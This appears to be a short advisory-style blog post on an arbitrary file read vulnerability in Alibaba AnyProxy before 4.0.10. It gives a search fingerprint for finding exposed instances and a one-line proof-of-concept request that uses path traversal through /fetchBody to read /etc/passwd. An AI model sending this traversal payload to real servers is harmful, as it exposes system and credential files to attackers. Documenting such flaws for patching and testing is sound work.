Alibaba Anyproxy Fetchbody Arbitrary File Reading Vulnerability
Alibaba Anyproxy Fetchbody Arbitrary File Reading Vulnerability
Alibaba AnyProxy fetchBody Arbitrary file reading vulnerability
Vulnerability Description
Alibaba AnyProxy has arbitrary file reading. Through the vulnerability, attackers can obtain server sensitive information.
Vulnerability Impact
Alibaba AnyProxy < 4.0.10
Network surveying and mapping
“anyproxy”
Vulnerability reappears
The page is as follows
Verify that the POC is
/fetchBody?id=1/../../../../../../../../etc/passwd
This post is licensed under CC BY 4.0 by the author.